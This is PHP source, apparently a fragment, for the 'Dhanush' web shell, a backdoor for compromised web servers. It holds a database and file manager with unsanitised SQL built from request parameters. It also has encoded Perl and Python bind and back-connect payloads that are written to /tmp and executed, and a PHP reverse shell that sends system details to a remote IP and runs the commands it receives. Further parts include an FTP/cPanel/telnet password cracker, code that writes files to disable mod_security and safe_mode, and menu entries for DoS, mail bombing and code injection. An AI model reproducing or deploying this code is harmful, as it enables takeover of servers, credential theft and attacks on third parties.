\r\n\r\n"; + + $count = 0; + while ($row = mysql_fetch_assoc($result)) + { + echo "\r\n"; + + if ($count==0) // list column names + { + echo "\r\n"; + while($key = key($row)) + { + echo "\r\n"; + next($row); + } + echo "\r\n"; + } + + foreach($row as $r) // list content of column names + { + if ($r=='') $r = 'NULL'; + echo "\r\n"; + } + echo "\r\n"; + $count++; + } + echo "
" . $key . "
" . $r . "
\n\r" . $count . " rows returned.\r\n"; + echo ""; + } + + // View Table Data + if($_GET['action'] == "viewdata") + { + global $queryStr, $action, $mysqlHandle, $dbname, $tablename, $PHP_SELF, $errMsg, $page, $rowperpage, $orderby, $data; + $dbserver = $_COOKIE["dbserver"]; + $dbuser = $_COOKIE["dbuser"]; + $dbpass = $_COOKIE["dbpass"]; + $dbname = $_GET['dbname']; + $tablename = $_GET['tablename']; + echo "
"; + ?> +

+
+ + + + + + + +
+
+ Data in Table
"; + if( $tablename != "" ) + echo "$dbname > $tablename
"; + else + echo "$dbname
"; + + $queryStr = ""; + $pag = 0; + $queryStr = stripslashes( $queryStr ); + if( $queryStr == "" ) + { + if(isset($_REQUEST['page'])) + { + $res = mysql_query("select * from $tablename"); + $getres = mysql_num_rows($res); + $coun = ceil($getres/30); + if($_REQUEST['page'] != 1) + + $pag = $_REQUEST['page'] * 30; + else + $pag = $_REQUEST['page'] * 30; + + $queryStr = "SELECT * FROM $tablename LIMIT $pag,30"; + $sql = mysql_query("SELECT $rowid FROM $tablename ORDER BY $rowid LIMIT $pag,30"); + $arrcount = 1; + $arrdata[$arrcount] = 0; + while($row = mysql_fetch_array($sql)) + { + $arrdata[$arrcount] = $row[$rowid]; + $arrcount++; + } + } + else + { + $queryStr = "SELECT * FROM $tablename LIMIT 0,30"; + $sql = mysql_query("SELECT $rowid FROM $tablename ORDER BY $rowid LIMIT 0,30"); + $arrcount = 1; + $arrdata[$arrcount] = 0; + while($row = mysql_fetch_array($sql)) + { + $arrdata[$arrcount] = $row[$rowid]; + $arrcount++; + } + } + if( $orderby != "" ) + $queryStr .= " ORDER BY $orderby"; + echo "Schema\n"; + } + + + $pResult = mysql_query($queryStr ); + $fieldt = mysql_fetch_field($pResult); + $tablename = $fieldt->table; + $errMsg = mysql_error(); + + $GLOBALS[queryStr] = $queryStr; + + if( $pResult == false ) + { + echoQueryResult(); + return; + } + if( $pResult == 1 ) + { + $errMsg = "Success"; + echoQueryResult(); + return; + } + + echo "
\n"; + + $row = mysql_num_rows( $pResult ); + $col = mysql_num_fields( $pResult ); + + if( $row == 0 ) + { + echo "No Data Exist!"; + return; + } + + if( $rowperpage == "" ) $rowperpage = 30; + if( $page == "" ) $page = 0; + else $page--; + mysql_data_seek( $pResult, $page * $rowperpage ); + + echo "\n"; + echo "\n"; + for( $i = 0; $i < $col; $i++ ) + { + $field = mysql_fetch_field( $pResult, $i ); + echo "\n"; + } + echo "\n"; + echo "\n"; + $num=1; + + + $acount = 1; + + for( $i = 0; $i < $rowperpage; $i++ ) + { + $rowArray = mysql_fetch_row( $pResult ); + if( $rowArray == false ) break; + echo "\n"; + $key = ""; + for( $j = 0; $j < $col; $j++ ) + { + $data = $rowArray[$j]; + + $field = mysql_fetch_field( $pResult, $j ); + if( $field->primary_key == 1 ) + $key .= "&" . $field->name . "=" . $data; + + if( strlen( $data ) > 30 ) + $data = substr( $data, 0, 30 ) . "..."; + $data = htmlspecialchars( $data ); + echo "\n"; + } + + if(!is_numeric($arrdata[$acount])) + echo "\n"; + else + { + echo "\n"; + echo "\n"; + $acount++; + } + } + echo "\n"; + + + echo "
"; + if($action == "viewdata") + echo "".$field->name."\n"; + else + echo $field->name."\n"; + echo "Action
\n"; + echo "$data\n"; + echo "No KeyEditDelete
"; + if($arrcount > 30) + { + $res = mysql_query("select * from $tablename"); + $getres = mysql_num_rows($res); + $coun = ceil($getres/30); + echo "
"; + echo "
"; + } + } + + // Delete Table Data + if($_GET['action'] == "deleteData") + { + $dbserver = $_COOKIE["dbserver"]; + $dbuser = $_COOKIE["dbuser"]; + $dbpass = $_COOKIE["dbpass"]; + $dbname = $_GET['dbname']; + $tablename = $_GET['tablename']; + $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass); + mysql_select_db($dbname); + $sql = mysql_query("SELECT `COLUMN_NAME` FROM `information_schema`.`COLUMNS` WHERE (`TABLE_SCHEMA` = '$dbname') AND (`TABLE_NAME` = '$tablename') AND (`COLUMN_KEY` = 'PRI');"); + $row = mysql_fetch_array($sql); + $row = $row['COLUMN_NAME']; + $rowid = $_GET[$row]; + mysql_query("delete from $tablename where $row = '$rowid'"); + listtable(); + } + // Edit Table Data + if($_GET['action'] == "editData") + { + global $queryStr, $action, $mysqlHandle, $dbname, $tablename, $PHP_SELF, $errMsg, $page, $rowperpage, $orderby, $data; + $dbserver = $_COOKIE["dbserver"]; + $dbuser = $_COOKIE["dbuser"]; + $dbpass = $_COOKIE["dbpass"]; + $dbname = $_GET['dbname']; + $tablename = $_GET['tablename']; + echo "
"; + ?> +

+
+ primary_key == 1 ) + if( $field->numeric == 1 ) + $key .= $field->name . "=" . $GLOBALS[$field->name] . " AND "; + else + $key .= $field->name . "='" . $GLOBALS[$field->name] . "' AND "; + } + $key = substr( $key, 0, strlen($key)-4 ); + + mysql_select_db( $dbname, $mysqlHandle ); + $pResult = mysql_query( $queryStr = "SELECT * FROM $tablename WHERE $row = $rowid", $mysqlHandle ); + $data = mysql_fetch_array( $pResult ); + + echo "\n"; + echo "\n"; + echo "\n"; + echo "\n"; + echo "\n"; + echo "\n"; + echo "\n"; + + $pResult = mysql_db_query( $dbname, "SHOW fields FROM $tablename" ); + $num = mysql_num_rows( $pResult ); + + $pResultLen = mysql_list_fields( $dbname, $tablename ); + $fundata1 = "'action','editsubmitData','dbname','".$dbname."','tablename','".$tablename."',"; + $fundata2 = "'action','insertdata','dbname','".$dbname."','tablename','".$tablename."',"; + for( $i = 0; $i < $num; $i++ ) + { + $field = mysql_fetch_array( $pResult ); + $fieldname = $field["Field"]; + $fieldtype = $field["Type"]; + $len = mysql_field_len( $pResultLen, $i ); + + echo ""; + echo ""; + echo ""; + echo "\n"; + $value = htmlspecialchars($data[$i]); + $type = strtok( $fieldtype, " (,)\n" ); + if( $type == "enum" || $type == "set" ) + { + echo "\n"; + } + else + { + if( $len < 40 ) + echo "\n"; + else + echo ""; + } + $fundata1=eregi_replace(',$', '', $fundata1); + $fundata2=eregi_replace(',$', '', $fundata2); + + echo "
NameTypeFunctionData
$fieldname".$field["Type"]."\n"; + echo "\n"; + echo "\n"; + if( $type == "enum" ) + echo "\n"; + while( $str = strtok( "'" ) ) + { + if( $value == $str ) + echo "\n"; + } + $fundata1 .= "'dhanush_".$fieldname."',dhanush_".$fieldname.".value,"; + $fundata2 .= "'dhanush_".$fieldname."',dhanush_".$fieldname.".value,"; + echo "

\n"; + echo "\n"; + echo "\n"; + echo "

\n"; + } + } +// Edit Submit Table Data +else if($_REQUEST['action'] == "editsubmitData") +{ + $dbserver = $_COOKIE["dbserver"]; + $dbuser = $_COOKIE["dbuser"]; + $dbpass = $_COOKIE["dbpass"]; + $dbname = $_POST['dbname']; + $tablename = $_POST['tablename']; + + $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass); + mysql_select_db($dbname); + + $sql = mysql_query("SELECT `COLUMN_NAME` FROM `information_schema`.`COLUMNS` WHERE (`TABLE_SCHEMA` = '$dbname') AND (`TABLE_NAME` = '$tablename') AND (`COLUMN_KEY` = 'PRI');"); + $row = mysql_fetch_array($sql); + $row = $row['COLUMN_NAME']; + $rowid = $_POST[$row]; + + $pResult = mysql_db_query( $dbname, "SHOW fields FROM $tablename" ); + $num = mysql_num_rows( $pResult ); + + $rowcount = $num; + + $pResultLen = mysql_list_fields( $dbname, $tablename ); + + for( $i = 0; $i < $num; $i++ ) + { + $field = mysql_fetch_array( $pResult ); + $fieldname = $field["Field"]; + $arrdata = $_REQUEST[$fieldname]; + + $str .= " " . $fieldname . " = '" . $arrdata . "'"; + $rowcount--; + if($rowcount != 0) + $str .= ","; + } + + $str = "update $tablename set" . $str . " where $row=$rowid"; + mysql_query($str); + ?>
File $v Deleted Successfully
"; + else + echo "
Cannot Delete File $v
"; + } + else if(is_dir($v)) + { + rrmdir($v); + } + } + } + else if($_POST['choice'] == "chmod") + { ?> +
+ + + + + + + + + +
Change Permissions
+
+ +
=0;--$i) + $perms += (int)$_POST['chmode'][$i]*pow(8, (strlen($_POST['chmode'])-$i-1)); + echo "
"; + if(@chmod($v,$perms)) + echo "File $v Permissions Changed Successfully
"; + else + echo "Cannot Change $v File Permissions
"; + echo "
"; + } + } + + } + } + else if($_POST['choice'] == "compre") + { + $actbox = $_POST["actbox"]; + foreach ($actbox as $myv) + $myv = explode(",",$myv); + foreach ($myv as $v) + { + if(is_file($v)) + { + $zip = new ZipArchive(); + $filename= basename($v) . '.zip'; + if(($zip->open($filename, ZipArchive::CREATE))!==true) + { echo '
Error: Unable to create zip file for $v';} + else {echo "
File $v Compressed successfully";} + $zip->addFile(basename($v)); + $zip->close(); + } + else if(is_dir($v)) + { + if($os == "Linux") + { + $filename= basename($v); + execmd("tar --create --recursion --file=$filename.tar $v"); + echo "
File $v Compressed successfully as $v.tar"; + } + } + } + } + else if($_POST['choice'] == "uncompre") + { + $actbox = $_POST["actbox"]; + foreach ($actbox as $myv) + $myv = explode(",",$myv); + foreach ($myv as $v) + { + if(is_file($v) || is_dir($v)) + { + $zip = new ZipArchive; + $filename= basename($v); + $res = $zip->open($filename); + if ($res === TRUE) + { + $pieces = explode(".",$filename); + $zip->extractTo($pieces[0]); + $zip->close(); + echo "
File $v Unzipped successfully"; + } else + echo "
Error: Unable to Unzip file $v"; + } + } + } +} +else if(isset($_GET['sitename'])) +{ + $sitename = str_replace("http://","",$_GET['sitename']); + $sitename = str_replace("http://www.","",$sitename); + $sitename = str_replace("www.","",$sitename); + $show = myexe("ls -la /etc/valiases/".$sitename); + if(!empty($show)) + echo $show; + else + echo "Cannot get the username"; +} +else if(isset($_GET['mydata'])) +{ + listdatabase(); +} +else if(isset($_GET['home'])) +{ + mainfun($_GET['home']); +} +else if(isset($_GET['dir'])) +{ + mainfun($_GET['myfilepath']); +} +else if(isset($_GET['mydirpath'])) +{ + echo is_writable($_GET['mydirpath'])?"< writable >":"< not writable >"; +} +else +{ +?> + +Dhanush : By Arjun + + + + +
+ + + + + + + + + + 2) + { + flush(); + $count++; + } + } + } + ?> 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named") + continue; + $count++; + } + ?> + + + + + + + + + + + + + + + + +
System Info : Server Port : Software Info
Uid : Websites : Websites :
Disk Space : Free Space : Server IP : Your IP :
View Directories : Current Directory : + ".htmlspecialchars($b).$directorysperator.''; + $i++; + } + + ?> + [Home]Disable functions : Safe Mode : Download It
+ +'symlinkserver','Forum'=>'forum','Sec. Info'=>'secinfo','Code Inject'=>'injector','Bypassers'=>'bypass','Server Fuzzer'=>'fuzz','Zone-h'=>'zone','DoS'=>'dos','Mail'=>'mailbomb','Tools'=>'tools','PHP'=>'phpc','Exploit'=>'exploit','Connect'=>'connect'); + $m2 = array('SQL'=>'database','404 Page'=>'404','Malware Attack'=>'malattack','Cpanel Cracker'=>'cpanel','About'=>'about'); + echo " + "; + $menu = ''; + + foreach($m1 as $k => $v) + $menu .= ""; + echo $menu; + echo " +
[".$k."]
+ + + "; + foreach($m2 as $k => $v) + $menu1 .= ""; + echo $menu1; + echo " + + +
[".$k."][SelfKill][LogOut]
";?> + +
+ + SecFilterEngine Off + SecFilterScanPOST Off + \n\r"); + + $file_pointer = fopen("ini.php", "w+"); + fwrite($file_pointer, ""); + + $file_pointer = fopen("php.ini", "w+"); + fwrite($file_pointer, "safe_mode = Off"); + + fclose($file_pointer); + + } + + else if(isset($_POST['cpanelattack'])) + { + if(!empty($_POST['username']) && !empty($_POST['password'])) + { + $userlist=explode("\n",$_POST['username']); + $passlist=explode("\n",$_POST['password']); + + if($_POST['cracktype'] == "ftp") + { + foreach ($userlist as $user) + { + $pureuser = trim($user); + foreach ($passlist as $password ) + { + $purepass = trim($password); + ftp_check($_POST['target'],$pureuser,$purepass,$connect_timeout); + } + } + } + if ($_POST['cracktype'] == "cpanel" || $_POST['cracktype'] == "telnet") + { + if($cracktype == "telnet") + $cpanel_port="23"; + else + $cpanel_port="2082"; + foreach ($userlist as $user) + { + $pureuser = trim($user); + + echo " [ - ] + Processing user $pureuser ...

"; + + foreach ($passlist as $password ) + { + $purepass = trim($password); + cpanel_check($_POST['target'],$pureuser,$purepass,$connect_timeout); + + } + } + } + } + else + $bdmessage = "
Enter Username & Password List
"; + } + +else if(isset($_GET['info'])) +{ + $bdmessage = "
".nl2br(shell_exec("whois ".$_GET['info']))."
"; +} +else if(isset($_POST['u'])) +{ + $path = $_REQUEST['path']; + if(is_dir($path)) + { + $setuploadvalue = 0; + $uploadedFilePath = $_FILES['uploadfile']['name']; + $tempName = $_FILES['uploadfile']['tmp_name']; + if($os == "Windows") + $uploadPath = $path . $directorysperator . $uploadedFilePath; + else if($os == "Linux") + $uploadPath = $path . $directorysperator . $uploadedFilePath; + if($stat = move_uploaded_file($_FILES['uploadfile']['tmp_name'] , $uploadPath)) + $bdmessage = "File uploaded to $uploadPath"; + else + $bdmessage = "Failed to upload file to $uploadPath"; + } + ?>$out\n".execmd("ps aux | grep bp.pl").""; + } + else + { + @$fh=fopen("/tmp/bp.pl","w"); + @fwrite($fh,gzinflate(base64_decode($bind_port_p))); + @fclose($fh); + execmd("chmod 0755 ".getcwd()."/bp.pl"); + execmd("perl ".getcwd()."/bp.pl ".$_POST['port']." ". $passwd ." &"); + $bdmessage = "
$out\n".execmd("ps aux | grep bp.pl")."
"; + } + } + } +} +else if(isset($_POST['backconnect'])) +{ + if($_POST['ip'] != "" && $_POST['port'] != "") + { ?>Trying to connect..."; + execmd("perl ".getcwd()."/bc.pl $host $port &",$disable); + if(!@unlink(getcwd()."/bc.pl")) echo "Warning: Failed to delete reverse-connection program
"; + } + else + { + @$fh=fopen("/tmp/bc.pl","w"); + @fwrite($fh,gzuncompress(base64_decode($backconnect_perl))); + @fclose($fh); + $bdmessage = "Trying to connect..."; + execmd("perl /tmp/bc.pl $host $port &",$disable); + if(!@unlink("/tmp/bc.pl")) + echo "

Warning: Failed to delete reverse-connection program


"; + } + } + else if($_POST["lang"] == "python") + { + if(is_writable(".")) + { + $w_file=@fopen(getcwd()."/bc.py","w") or die(mysql_error()); + if($w_file) + { + @fputs($w_file,gzuncompress(base64_decode($back_connect_p))); + @fclose($w_file); + chmod(getcwd().'/bc.py', 0777); + } + execmd("python ".getcwd()."/bc.py $host $port &",$disable); + $bdmessage = "Trying to connect..."; + + if(!@unlink(getcwd()."/bc.py")) + echo "

Warning: Failed to delete reverse-connection program


"; + } + else + { + $w_file=@fopen("/tmp/bc.py","w"); + if($w_file) + { + @fputs($w_file,gzuncompress(base64_decode($back_connect_p))); + @fclose($w_file); + chmod('/tmp/bc.py', 0777); + } + execmd("python /tmp/bc.py $host $port &",$disable); + $bdmessage = "Trying to connect..."; + if(!@unlink("/tmp/bc.py")) + echo "

Warning: Failed to delete reverse-connection program


"; + } + } + else if($_POST["lang"] == "php") + { + $bdmessage = "Trying to connect..."; + $ip = $_POST['ip']; + $port=$_POST['port']; + $sockfd=fsockopen($ip , $port , $errno, $errstr ); + if($errno != 0) + { + $bdmessage = "$errno : $errstr"; + } + else if (!$sockfd) + { + $result = "

Fatal : An unexpected error was occured when trying to connect!

"; + } + else + { + fputs ($sockfd ,"\n=================================================================\nCoded By Arjun\n================================================================="); + $pwd = exec_all("pwd"); + $sysinfo = exec_all("uname -a"); + $id = exec_all("id"); + $len = 1337; + fputs($sockfd ,$sysinfo . "\n" ); + fputs($sockfd ,$pwd . "\n" ); + fputs($sockfd ,$id ."\n\n" ); + fputs($sockfd ,$dateAndTime."\n\n" ); + while(!feof($sockfd)) + { + $cmdPrompt ="(dhanush)[$]> "; + fputs ($sockfd , $cmdPrompt ); + $command= fgets($sockfd, $len); + fputs($sockfd , "\n" . exec_all($command) . "\n\n"); + } + fclose($sockfd); + } + } + } +} +else if (isset ($_GET['val1'], $_GET['val2']) && is_numeric($_GET['val1']) && is_numeric($_GET['val2'])) +{ + $temp = ""; + for(;$_GET['val1'] <= $_GET['val2'];$_GET['val1']++) + { + $uid = @posix_getpwuid($_GET['val1']); + if ($uid) + $temp .= join(':',$uid)."\n"; + } + echo '
'; + paramexe('Users', $temp); +} +else if(isset($_GET['download'])) +{ + download(); +} +else +{ + ?>< writable >":"< not writable >"; +?> +

+ + + + + + + + + + + +
+
+Upload file :
+  +
+ +
+		Create File : +
+ + +
+ +
Execute :
+ + +
Create Directory :
+ + +
Get Exploit 
+ +

+ + +
+		 +
+Some Commands
+ + + + + + + +
+

+ + + + + + + + +
+
+धनुष
+--==Coded By Arjun==--
जय हिन्द
+ +
+
+
+ + + + + + + + + + + + + + + + + + + + + +
Dhanush
User Name :
Password :
--==Coded By Arjun==--
+
+ +
+
+
+ + +